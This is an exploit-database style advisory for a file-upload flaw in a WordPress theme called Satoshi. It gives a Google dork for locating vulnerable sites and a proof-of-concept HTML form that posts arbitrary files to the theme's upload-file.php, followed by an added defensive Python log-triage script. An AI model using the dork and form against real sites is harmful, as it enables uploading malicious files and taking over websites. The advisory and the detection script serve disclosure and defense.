#- Title: Satoshi Theme - File Upload CSRF
#- Author: Cyber_Taregh
#- Date: 2014-12-06
#- Developer : vooshtheme
#- Link Download : wpthemedownload .org/satoshi/
#- Google Dork: inurl:"/Themes/satoshi/"
#- Fixed in Version : -
#- Tested on : linux
======================================================
Classification
  Type         : CSRF
  OWASP Top 10 : A8: Cross-Site Request Forgery (CSRF)
  CWE          : CWE-352
Miscellaneous
  Submitter    : Anonymous
  Views        : 750
  Verified     : No
  WPVDB ID     : 7709
-- Proof Of Concept --
When vuln : -
CSRF :
<form enctype="multipart/form-data"
action="http://target .com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
If success : Succes
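
Added example (not part of the original advisory or the theme's code): a log triage script that flags POST requests to the upload-file.php path from the form above when the Referer header is missing or names another host. The hostname blog.example and the log lines are constructed, and the "combined" access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit

# Path from the advisory's form action; the hostname is an assumed placeholder.
UPLOAD_PATH = "/wp-content/themes/satoshi/upload-file.php"
SITE_HOST = "blog.example"

# Apache/nginx "combined" access-log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def classify_referer(referer, site_host=SITE_HOST):
    """Return 'missing', 'same-site' or 'cross-site' for a Referer value."""
    if referer in ("", "-"):
        return "missing"
    host = (urlsplit(referer).hostname or "").lower()
    return "same-site" if host == site_host.lower() else "cross-site"

def find_suspect_uploads(lines, site_host=SITE_HOST):
    """Collect POSTs to the theme's upload handler that did not originate on-site."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        # Compare the path only, case-insensitively, ignoring any query string.
        if not urlsplit(m["target"]).path.lower().endswith(UPLOAD_PATH):
            continue
        origin = classify_referer(m["referer"], site_host)
        if origin != "same-site":
            findings.append((m["ts"], m["ip"], int(m["status"]), origin, m["referer"]))
    return findings

# Constructed sample lines (documentation IP ranges, placeholder hostnames).
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Dec/2014:10:01:12 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 6 "http://other.example/page.html" "Mozilla/5.0"',
    '198.51.100.4 - - [06/Dec/2014:10:02:40 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 6 "http://blog.example/wp-admin/themes.php" "Mozilla/5.0"',
    '198.51.100.9 - - [06/Dec/2014:10:03:05 +0000] "POST /wp-content/themes/satoshi/upload-file.php HTTP/1.1" 200 6 "-" "curl/7.38.0"',
    '198.51.100.4 - - [06/Dec/2014:10:04:00 +0000] "GET /wp-content/themes/satoshi/style.css HTTP/1.1" 200 5120 "http://blog.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_suspect_uploads(SAMPLE_LOG):
        print(finding)
```

The Referer check is a triage heuristic only: a same-site Referer does not show that the upload was intended, and a missing one can come from privacy settings, so flagged entries need follow-up against the files actually written by the handler.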